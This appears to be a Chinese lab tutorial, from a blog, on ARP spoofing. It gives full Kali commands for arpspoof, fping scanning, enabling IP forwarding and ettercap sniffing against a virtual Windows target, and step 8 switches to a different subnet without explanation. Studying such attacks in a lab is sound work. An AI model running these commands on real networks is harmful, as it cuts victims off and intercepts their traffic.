目的
使用kali系统进行ARP欺骗,导致局域网目标设备无法上网
准备环境
虚拟机 | 系统 | IP地址 | MAC地址 |
攻击者 | Kali | 192.168.6.129 | 00-0c-29-d3-14-8b |
被攻击者(靶机) | Windows | 192.168.6.137 | 00-50-56-eb-3a-33 |
实验步骤
1、安装arpspoof
命令:apt-get install dsniff
2、扫描IP
用arpspoof工具,查看同网段下的所有活动IP,确认被攻击的IP地址
命令:fping –asg 局域网范围
fping –asg 192.168.6.0/24
下图看到,同网段有四个活动IP
3、实施断网攻击
命令:arpspoof –i 网卡 –t 靶机IP地址 网关
-i 指定网卡
-t 持续不断攻击
我的命令:arpspoof –i eth0 –t 192.168.6.137 192.168.6.1
Kali中持续不断地发送arp应答包,进行ARP欺骗
4、查看Win10靶机网络状态
Windows10(靶机):
被攻击机ping不通显示断网,上不了网
被攻击的状态
5、查看Win10的MAC地址
在windows10虚拟机(靶机)中查看局域网中的IP-MAC对照表
发现Win10的192.168.6.1(网关)的MAC地址已经变成了Kali eth0网卡的MAC地址
6、停止攻击
在Kali终端按下Ctrl+c
就ok了
再次在win10中查看MAC地址,发现网关的MAC已经变回来了,因为ARP欺骗停止了,也证明了我们刚才的ARP欺骗成功了!
7、开启IP转发功能
开启IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,接下来修改为1
命令:echo 1 > /proc/sys/net/ipv4/ip_forward
然后输入命令查看:cat /proc/sys/net/ipv4/ip_forward 看看有没有改。
8、ettercap嗅探
输入命令:arpspoof -i eth0 -t 192.168.220.153 192.168.220.2 发起攻击
欺骗成功,接下来我们在kali攻击机 再打开一个终端,使用ettercap嗅探
输入命令:ettercap -Tq -i eth0
嗅探成功!!!
Kali里有一个ettercap嗅探工具,后面再来用一下ettercap嗅探工具,再详细讲。
本文只做实验教程,请勿做他用